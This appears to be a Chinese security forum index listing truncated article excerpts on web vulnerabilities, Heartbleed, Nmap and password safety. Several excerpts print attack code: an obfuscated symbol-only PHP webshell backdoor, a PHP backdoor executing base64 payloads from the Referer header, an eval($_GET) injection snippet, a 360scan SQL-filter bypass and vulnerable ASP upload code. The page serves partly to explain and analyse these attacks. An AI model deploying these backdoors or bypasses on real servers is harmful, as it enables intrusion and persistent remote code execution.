电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

会员上传文件漏洞，可以上传任意后缀 user/swfupload.asp文件漏洞复制代码代码如下:If UpFileObj.Form("NoReName")="1" Then '不更名 Dim PhysicalPath,FsoObj:Set FsoObj = KS.InitialObject(KS.Setting(99)) PhysicalPath = Server.MapPath(replace(TempFileStr,"|","")) TempFileStr= mid(TempFileStr,1, InStrRev(TempF ...

360scan正则：INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据，还可以:insert into xxx set xx = 提交： http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456') 提交set语法： http://localhost/360.php?sql=insert into user set user='admin',pass='1234 ...

A、公共场所免费的WiFi是元凶，假WiFi15分钟可盗取信息 据介绍，这种骗术的成本并不高，一台WIN7系统电脑、一套无线网络及一个网络包分析软件，设置一个无线热点AP，就可以轻松地搭建一个不设密码的WiFi。 现如今公共场所免费WiFi铺天盖地，很难分辨哪个账号是不法分子搭建的。如果不慎使用，不法分子只需15分钟就可窃取手 ...

1，介绍 本文的目的是展示CSRF漏洞的危害，以D-link的DIR-600路由器（硬件版本：BX，固件版本：2.16）的CSRF漏洞为例。D-link的CSRF漏洞已经是公开的，本文将详细描述一下整个D-link CSRF漏洞的利用，如何通过CSRF漏洞实现远程管理访问D-link路由器。 2，CSRF漏洞说明 如果某些request请求中没有csrf  token或不需要密 ...

　　很多网友在找心脏出血漏洞修复教程，互联网心脏出血漏洞怎么修复呢?作为普通网民还如何防止这一漏洞呢?下文将会为大家详细介绍，一起来了解一下吧。    　　官方发布了漏洞的修复方案：因为这是一个旧版本OpenSSL的安全漏洞，开发者把服务器程序升级到OpenSSL1.0.1g可以解决。  　　目前包括支付宝、 ...

　　小编带来了心脏出血漏洞检测软件下载地址，大家可以下载心脏出血漏洞一键检测app，为了我们账户的安全，大家都可以检测一下自己的手机是否存在心脏出血漏洞哦~    　　尽管“心脏出血”是一个网络漏洞，但是某些手机App通过HTTP或HTTPS来访问服务器并使用OpenSSL，也由此带来了风险。手机用户面 ...

　　小编带来了openssl安全漏洞介绍，想知道openssl心脏出血漏洞防治方法是什么吗?近日，openssl心脏出血漏洞被曝光，该漏洞影响范围甚广，大家可以通过下文了解详细信息。    　　--什么是SSL? 　　SSL是一种流行的加密技术，可以保护用户通过互联网传输的隐私信息。当用户访问Gmail.com等安全网站时，就会在U ...

　　小编带来了openssl漏洞详情，想知道openssl重大安全漏洞具体是什么情况吗?会不会威胁到我们的财产安全呢?下文将会为大家详细介绍，网友们可以来了解一下。  　　昨日，OpenSSL(为网络通信提供安全及数据完整性的一种安全协议)爆出本年度最严重的安全漏洞。利用该漏洞，黑客坐在自己家里电脑前，就可以实时获取到很 ...

复制代码代码如下:<?php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");${'_'.$_}['_'](${'_'.$_}['__']);?> 以上是网上流传的一段由纯符号组成的一句话后门代码，这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。 第一行：$_="";定义一个以下划线作为命名的字 ...

本地测试结果如下图。 本程序只作为学习作用，请勿拿去做坏事。 复制代码代码如下: <?php //1.php header('Content-type:text/html;charset=utf-8'); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6))))); }<?p ...

Nmap是一款非常强大的实用工具,可用于： 检测活在网络上的主机（主机发现）检测主机上开放的端口（端口发现或枚举）检测到相应的端口（服务发现）的软件和版本检测操作系统，硬件地址，以及软件版本检测脆弱性的漏洞（Nmap的脚本）Nmap是一个非常普遍的工具，它有命令行界面和图形用户界面。本人包括以下方面的内容:&n ...

中断INT 21H :1、字符功能调用类(Character-Oriented Function)01H、07H和08H —从标准输入设备输入字符02H —字符输出03H —辅助设备的输入04H —辅助设备的输出05H —打印输出06H —控制台输入/输出09H —显示字符串0AH — 键盘缓冲输入0BH —检测输入状态0CH —清输 ...

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名，是国内最知名的PHP开源网站管理系统，也是使用用户最多的PHP类CMS系统。 近日，网友在dedecms中发现了全版本通杀的SQL注入漏洞，目前官方最新版已修复该漏洞，相关利用代码如下： EXP: 复制代码代码如下: http://*.*.com/p ...

　　电子邮件又称电子信箱、电子邮政，它是—种用电子手段提供信息交换的通信方式，是Internet应用最广的服务，通过网络的电子邮件系统，用户可以用非常低廉的价格(不管发送到哪里，都只需负担电话费和网费即可)，以非常快速的方式(几秒钟之内可以发送到世界上任何你指定的目的地)，与世界上任何一个角落的网络用户联 ...

网友们在电脑遇到病毒时，肯定是要杀毒的，但是使用杀毒的方法都是用一般的操作，比如杀毒软件、打开进程管理器关闭不熟悉的进程等。这样的杀毒方式好似太过于单一啦!所以今天小编就为网友们了解一种神奇的杀毒方法，那就是记事本杀毒。到底是怎么回事呢?一起去看看吧! 第一步：在“开始→运行”中输入CMD， ...

远程连接到网络资源已经成为现代企业很多员工的工作需要。无论这种连接是通过VPN、远程桌面还是安全壳(SSH)进行的，这种连接将不可避免地穿过装载着路由器、交换机和防火墙的网络，而这些设备中有很多都很容易受到攻击。 安全行业的企业和管理人员都意识到了这个问题，攻击者也意识到这些设备中存在漏洞，任何具有基本网络 ...

作者：phpeval 前段时间一个程序出的问题。就和这差不多。 复制代码代码如下:<?php$code="${${eval($_GET[c])}}";?> 对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提交c=echo 11111; 发现1111也被输出了。这个代码被执行了。 (好些PHP的代码在写文件 ...

即使在经历了无数的黑客盗密事件之后，还是有很多人不知从中吸取教训，抑或是很多人根本不在意自己的账号密码是否安全！他们一直用着最简单最易记的密码，而这些往往也是账号密码被盗的主要原因。那么，你知道容易被盗，但又十分受欢迎的密码都有哪些吗？本文将为你揭开谜底。 10月4日，报道称Adobe公司系统遭黑客入侵，被 ...

在正式进行各种“黑客行为”之前，黑客会采取各种手段，探测(也可以说“侦察”)对方的主机信息，以便决定使用何种最有效的方法达到自己的目的。 “IP”作为Net用户的重要标示，是黑客首先需要了解的。获取的方法较多，黑客也会因不同的网络情况采取不同的方法，如：在局域网内使用 Ping指令 ...

　　Flash Cookie比浏览器Cookie容量更大，可以跨浏览器对不同Cookies进行身份剔重，但是不易删除。让我们一起来看看如何关闭Flash Cookie吧： 　　1.用户打开一个新的浏览器窗口,在浏览器中输入如下网址： 　　http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html 　　2.打开网 ...